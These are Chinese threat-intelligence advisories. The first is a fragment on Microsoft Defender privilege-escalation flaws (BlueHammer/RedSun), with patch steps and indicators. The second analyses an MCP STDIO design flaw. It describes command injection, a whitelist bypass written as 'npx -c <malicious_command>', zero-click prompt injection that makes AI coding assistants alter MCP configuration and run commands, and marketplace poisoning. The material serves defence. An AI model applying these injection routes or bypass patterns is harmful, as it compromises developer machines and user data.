开发测试环境	高	代码签名环境被攻陷可导致供应链风险
运维跳板机	极高	SYSTEM权限可完全控制运维通道
域控制器所在终端	极高	可用于Active Directory提权攻击

漏洞利用窗口评估

BlueHammer漏洞的公开披露时间为2026年4月7日（早于官方修复），微软官方修复发布于4月14日。从4月7日至4月14日的7天零日窗口期内，漏洞利用代码可能已被恶意行为体获取并部署。

当前漏洞利用代码已进入地下黑市流通渠道。从漏洞公开到野外部署的典型时间窗口通常为2-4周，但考虑到该漏洞的低复杂度特性，实际利用可能更快出现。

国内企业应对建议

针对该漏洞对国内政企环境的影响，奇安信威胁情报中心建议采取以下分级响应措施：

紧急响应（72小时内）：

验证所有Windows终端的Defender平台版本是否升级至4.18.26030.3011或更高

优先处置面向互联网的高暴露面服务器和研发环境终端

启用端点检测与响应（EDR）系统对本地提权行为进行深度监控

中期加固（1-2周）：

部署应用白名单（AppLocker/WDAC）策略，限制非授权可执行文件在特权目录的执行

强化Active Directory域环境安全，监控异常的管理员账户创建行为

开展内部红蓝对抗演练，验证现有防护体系对该攻击链的检测能力

漏洞修复与防护建议

版本核查

微软已发布修复版本，建议立即执行以下核查步骤：

打开Windows安全中心应用（Windows Security）

导航至病毒和威胁防护 → 管理设置

点击保护更新 → 检查更新

进入设置 → 关于，查看反恶意软件客户端版本

确认版本号 ≥ 4.18.26030.3011

漏洞影响范围

软件/平台	受影响版本	已修复版本
Microsoft Defender Antimalware Platform	≤ 4.18.26020.6	≥ 4.18.26030.3011

特殊说明：即使Windows Defender被禁用，受影响的二进制文件仍存留于系统。微软澄清，禁用状态下的系统不处于可利用状态，但仍建议更新至安全版本。

企业级防护建议

补丁管理：确保企业补丁分发系统（WSUS/SCCM/Intune）已同步最新Defender平台更新
最小权限原则：限制本地管理员权限范围，减少攻击面
行为监控：部署EDR解决方案，监控MsMpEng.exe进程的异常子进程创建和文件写入行为
网络分段：对高价值资产实施严格的网络隔离，限制横向移动路径
日志分析：集中收集Windows安全日志，关联分析权限提升特征

总结

BlueHammer（CVE-2026-33825）和RedSun漏洞的连续披露，揭示了终端安全领域的深层次问题：即便是微软这样的顶级厂商，其核心安全产品同样存在可被利用的漏洞。更值得关注的是RedSun漏洞展现的安全工具滥用（Attack of the Transformers）这一新兴攻击范式——攻击者不再寻找传统代码缺陷，而是挖掘产品正常功能的误用路径。

从威胁情报角度评估，该漏洞对APT组织的利用价值极高，其公开披露显著降低了攻击门槛。考虑到Windows Defender的全球部署规模，奇安信威胁情报中心将该漏洞的全球威胁等级评定为"高"。

奇安信安全产品矩阵已支持对该攻击链的检测：

奇安信天眼新一代威胁感知系统：可检测RedSun攻击链的多个检测点

奇安信椒图（HIDS）：监控关键系统目录的异常写入行为

奇安信终端安管理系统（EDR）：提供进程行为链分析，识别权限提升攻击

IOC指标

类型	指标	说明
CVE	CVE-2026-33825	Microsoft Defender权限提升漏洞
CWE	CWE-1220	访问控制粒度不足（漏洞根因）
漏洞代号	BlueHammer	CVE-2026-33825的非官方命名
漏洞代号	RedSun	针对Defender云标签处理的独立漏洞
软件版本	≤ 4.18.26020.6	受影响Defender平台版本
修复版本	≥ 4.18.26030.3011	安全版本

MITRE ATT&CK技术编号参考

技术ID	战术	技术名称
T1068	权限提升（Privilege Escalation）	利用软件漏洞提权
T1548	权限提升（Privilege Escalation）	滥用权限控制机制
T1136.001	持久化（Persistence）	本地账户创建
T1544	持久化（Persistence）	远程文件替代
T1499.004	影响（Impact）	竞争条件滥用

参考来源

[1].https://cybersecuritynews.com/microsoft-defender-0-day-vulnerability/

[2].https://www.redpacketsecurity.com/redsun-a-windows-privilege-escalation-poc-that-turns-defender-into-part-of-the-attack-chain/

点击阅读原文至ALPHA 9.1

即刻助力威胁研判

阅读原文

跳转微信打开

MCP协议架构级漏洞深度分析：STDIO设计缺陷引发大规模AI供应链安全危机

Sun, 19 Apr 2026 09:30:00 +0800

原创威胁情报中心 2026-04-19 09:30 四川

奇安信威胁情报中心监测发现，Ox Security于4月披露了Anthropic公司MCP协议中存在的架构级设计缺陷。该漏洞根植于MCP协议的STDIO传输机制，利用此缺陷可实现未授权命令注入与远程代码执行，超过20万台服务器受影响，相关SDK累计下载量突破1.5亿次

威胁概览

奇安信威胁情报中心监测发现，安全研究机构Ox Security于2026年4月披露了Anthropic公司Model Context Protocol（MCP）协议中存在的架构级设计缺陷。该漏洞根植于MCP协议的STDIO传输机制，攻击者可利用此缺陷实现未授权命令注入与远程代码执行（RCE），受影响系统规模超过20万台服务器，相关SDK累计下载量突破1.5亿次。

威胁定性：高危（Critical）

评估维度	详情
漏洞类型	架构设计缺陷导致的命令注入与RCE
影响范围	20万+服务器，150M+SDK下载，7000+公开MCP实例
利用难度	低（无需高级技术背景）
攻击前提	低（部分场景为零点击利用）
厂商态度	拒绝修复，定性为"预期行为"
已披露CVE	10+（高危/严重级别）

从威胁情报角度评估，该漏洞已非单一产品安全事件，而是演变为AI基础设施层面的系统性供应链风险。Anthropic作为AI领域头部企业，其主导协议的架构缺陷将对整个AI开发生态产生深远影响。

技术根因剖析

MCP协议与STDIO传输机制

Model Context Protocol（MCP）是Anthropic于2024年11月发布的开源协议，旨在为大型语言模型（LLM）、AI应用和智能代理提供连接外部数据源、系统和服务统一接口。该协议支持多编程语言实现，包括Python、TypeScript、Java和Rust，覆盖当前主流AI开发技术栈。

核心问题在于MCP采用STDIO（标准输入/输出）作为本地传输机制。当AI应用需要调用MCP服务器时，协议设计允许以子进程形式启动MCP服务器，并通过STDIO进行进程间通信。

漏洞本质：STDIO传输层的设计逻辑存在根本性缺陷。当通过"command"参数传入任意操作系统命令时，该命令无论进程是否成功启动都会被执行。具体表现为：

若命令成功创建STDIO服务器，则返回句柄供后续使用

若命令执行失败，仍会在收到错误响应之前完成命令执行

这种"先执行、后验证"的行为模式，使攻击者可以在进程启动阶段注入恶意命令，利用命令执行到错误返回之间的时间窗口完成攻击。

攻击链技术解析

攻击者输入 → STDIO传输层 → 命令执行（无认证/无清理） → 系统接管 ↓ [漏洞触发] ↓ 返回错误信息（此时命令已执行完毕）

该攻击链具备以下特征：

1. 时间窗口利用：命令执行发生在STDIO错误处理流程之前
2. 认证绕过：STDIO传输层本身不包含认证机制
3. 清理失效：开发者层面的输入清理无法触及协议底层执行逻辑
4. 跨平台影响：影响所有使用官方SDK的项目（Python/TypeScript/Java/Rust）

四大攻击向量深度分析

奇安信威胁情报团队根据Ox Security研究报告，对该漏洞衍生的攻击向量进行系统性梳理：

攻击向量一：未授权命令注入

技术描述：STDIO传输机制允许攻击者直接注入任意操作系统命令，命令以服务器端执行权限运行，无需任何认证或输入清理。

影响范围：

• 所有版本的LangFlow（IBM开源低代码AI应用框架）
• GPT Researcher（开源深度研究AI代理）

技术影响：攻击者可获得目标服务器完整控制权，访问敏感用户数据、内部数据库、API密钥及聊天记录。

CVE关联：CVE-2025-65720（GPT Researcher）

攻击向量二：加固绕过攻击

技术描述：部分MCP实现已尝试通过白名单机制加固，仅允许特定命令（如"python"、"npm"、"npx"）通过"command"参数执行。攻击者可利用这些"安全"命令的参数注入能力绕过限制。

绕过技术：

npx -c <malicious_command>

通过在允许命令的子参数中传入恶意内容，攻击者可间接执行任意命令，将白名单防护形同虚设。

受影响项目：

• Upsonic（CVE-2026-30625）
• Flowise（GHSA-c9gw-hvqq-f33r）

威胁影响：即便开发者已实施基础安全加固措施，该漏洞仍可导致完整的命令注入和系统接管。

攻击向量三：零点击提示词注入

技术描述：在AI集成开发环境（IDE）和编程助手中，用户输入的提示词可直接影响MCP JSON配置，无需用户任何额外交互即可触发漏洞。

受影响产品：

• Windsurf（CVE-2026-30615）
• Claude Code
• Cursor
• Gemini-CLI
• GitHub Copilot

威胁特征：这是唯一真正的零点击攻击向量。用户仅需正常与AI助手对话，恶意构造的提示词即可触发MCP配置变更，进而执行任意命令。

厂商态度：Google、Microsoft及Anthropic均将此问题定性为"已知限制"或"非有效漏洞"，理由是修改配置需要用户明确授权。奇安信认为这一判断存在重大偏差——用户授权的是与AI进行对话交互，而非授权系统执行任意命令。

攻击向量四：MCP市场供应链投毒

技术描述：MCP市场允许开发者发布和分发MCP工具包，攻击者可向市场提交内含恶意命令的MCP包。研究团队测试结果显示：

• 测试样本：11个MCP市场
• 投毒成功：9个市场
• 概念验证：植入可执行任意命令的MCP包（测试使用创建空文件）

危害评估：

• 目标市场月访问量达数十万级别
• 单个恶意MCP包可在被发现前被数千开发者安装
• 每次安装即为攻击者提供目标机器的完整命令执行权限

攻击场景：这是一个典型的供应链投毒模式。攻击者只需成功提交一个恶意MCP包，即可实现对大量下游开发环境的规模化入侵。

MITRE ATT&CK战术技术映射

奇安信威胁情报团队将该漏洞相关攻击活动映射至MITRE ATT&CK框架：

战术阶段	技术ID	技术名称	适用场景
初始访问	T1190	利用面向公众的应用	暴露的MCP服务器
执行	T1059	命令与脚本解释器	通过STDIO注入的命令执行
执行	T1053	计划任务/作业	持久化部署后门
持久化	T1543	创建/修改系统进程	通过MCP建立持久化控制
权限提升	T1068	利用特权升级漏洞	命令以高权限执行
防御规避	T1027	混淆文件或信息	恶意MCP包编码混淆
凭证访问	T1552	未保护凭证	窃取API密钥和环境变量
横向移动	T1021	远程服务	通过MCP扩展攻击范围
数据外泄	T1041	通过C2通道外泄	窃取敏感数

国内关联影响评估

波及范围

从奇安信威胁情报中心监测数据来看，该漏洞对国内AI开发生态的影响体现在以下层面：

开发者生态层面：

• 国内大量AI应用基于Python开发，官方Python SDK受影响
• 开源AI框架（如LangFlow、Flowise）在GitHub上拥有大量国内开发者Fork和Star
• 主流AI编程助手（通义灵码、文心快码等）虽未在原报告提及，但若采用MCP协议同样面临风险

企业应用层面：

• 互联网企业AI Agent开发普遍采用MCP协议连接外部工具
• 金融、政务领域AI应用集成MCP进行数据对接
• 云服务商MCP相关产品线潜在受影响

供应链层面：

• MCP市场投毒可影响国内开发者通过镜像站获取的工具包
• 攻击者可通过国内技术社区传播恶意MCP包
• 开发环境容器镜像若包含易受攻击的MCP SDK，将导致大规模扩散

威胁行为体归因分析

初级威胁行为体（脚本小子）：

• 技术门槛低：STDIO注入无需高级漏洞利用技术
• 工具易获取：MCP市场投毒可批量自动化
• 目标价值高：开发者机器通常存储SSH密钥、API凭证、项目代码

高级持续性威胁（APT）组织：

• 供应链投毒模式契合APT攻击链设计
• 可针对特定开发团队实施定向入侵
• 利用开发者环境横向移动至目标企业网络

企业竞争对手/商业间谍：

• 窃取竞品代码和商业机密
• 获取API密钥进行资源滥用
• 在开发阶段植入后门，实现长期潜伏

漏洞处置现状与厂商立场分析

负责任披露过程

Ox Security安全研究团队于2025年11月启动该研究，历时约5个月，完成超过30次负责任披露协调：

• 向Anthropic提交漏洞详情及修复建议
• 协调30余家MCP提供商修补具体产品漏洞
• 推动10余个高危/严重级别CVE的发布

Anthropic官方立场

核心结论：Anthropic拒绝修改协议底层架构，明确表示该行为属于"预期行为"。

官方解释：

1. STDIO执行模型代表"安全默认值"
2. 输入清理责任应完全由SDK使用者承担
3. 仅更新安全指南，建议开发者"谨慎"使用STDIO适配器

后续动作：收到研究报告一周后，Anthropic悄然更新安全策略文档，将STDIO适配器使用标注为"需谨慎"。

奇安信专业评估

从安全工程实践角度，奇安信威胁情报团队对Anthropic的立场持明确异议：

架构层面的安全责任不可下放：

• 协议设计者对协议安全性承担首要责任
• SDK使用者无法在协议层施加有效安全约束
• "由使用者负责清理"意味着每个下游项目都需重复实现安全机制
• 架构缺陷导致的系统性风险无法通过下游补丁有效控制

"预期行为"不等于"安全行为"：

• 安全协议设计应遵循"默认安全"原则
• 命令执行前应进行显式授权验证
• STDIO传输层的"先执行后验证"模式本质上是不安全的设计选择

SDK层面的10+ CVE印证了架构缺陷：

• 若问题仅存在于下游实现，相关厂商应可独立修复
• 大量独立产品出现同类漏洞，指向共同的架构根因
• Anthropic作为协议制定者，有能力也有责任从协议层面解决该问题

缓解措施与安全建议

短期应急措施

措施类别	具体建议
禁用STDIO	评估并切换至SSE或其他传输机制
输入验证	对所有MCP命令参数实施严格白名单过滤
权限控制	MCP服务器以最低权限账户运行
网络隔离	限制MCP服务器网络访问能力
日志审计	监控异常命令执行行为
依赖审查	检查项目MCP依赖是否存在已知漏洞

中期加固方向

协议层面：

• 推动MCP协议引入命令执行授权机制
• 实现命令参数的架构级清理
• 添加传输层认证和完整性校验

SDK层面：

• 官方SDK应默认启用安全传输模式
• 提供安全配置指南和最佳实践
• 建立SDK安全更新响应机制

生态层面：

• 建立MCP包安全审核机制
• 实现包签名和来源验证
• 推动MCP安全标准的行业共识

长期战略建议

1. 供应链安全审计：对AI基础设施依赖的第三方协议实施安全评估
2. 零信任集成：MCP交互纳入零信任安全框架
3. 威胁建模：针对AI应用场景进行专项威胁建模
4. 应急响应准备：建立AI供应链安全事件应急响应预案

结论

MCP协议的STDIO设计缺陷是一个典型的系统性安全架构问题，而非单一产品漏洞。Anthropic拒绝从协议层面修复该缺陷的立场，使整个AI开发生态面临持续性供应链安全威胁。

关键风险点总结：

• 架构缺陷：STDIO传输机制先天存在命令注入风险
• 规模庞大：20万+服务器、1.5亿+下载量构成重大攻击面
• 利用门槛低：脚本小子到APT组织均可利用
• 厂商推诿：Anthropic以"预期行为"为由拒绝担责
• 生态脆弱：MCP市场投毒可实现规模化供应链攻击

奇安信威胁情报中心将持续跟踪该漏洞及相关威胁活动态势。建议所有使用MCP协议的企业和开发者立即评估风险暴露面，采取紧急缓解措施，并密切关注Anthropic后续安全公告。

IOC指标

类型	标识符	描述
CVE	CVE-2026-30625	Upsonic命令注入漏洞
CVE	CVE-2026-30615	Windsurf零点击提示词注入漏洞
CVE	CVE-2025-65720	GPT Researcher命令注入漏洞
GHSA	GHSA-c9gw-hvqq-f33r	Flowise加固绕过漏洞
TTP	T1059	命令与脚本解释器执行
TTP	T1190	利用面向公众的应用
TTP	T1027	混淆文件或信息

MITRE ATT&CK技术映射

战术	技术ID	名称
初始访问	T1190	利用面向公众的应用
执行	T1059	命令与脚本解释器
执行	T1053	计划任务/作业
持久化	T1543	创建/修改系统进程
权限提升	T1068	利用特权升级漏洞
防御规避	T1027	混淆文件或信息
凭证访问	T1552	未保护凭证
横向移动	T1021	远程服务
数据外泄	T1041	通过C2通道外泄

参考来源

https://go.theregister.com/feed/www.theregister.com/2026/04/16/anthropic_mcp_design_flaw/
Anthropic MCP官方文档与安全策略

阅读原文

跳转微信打开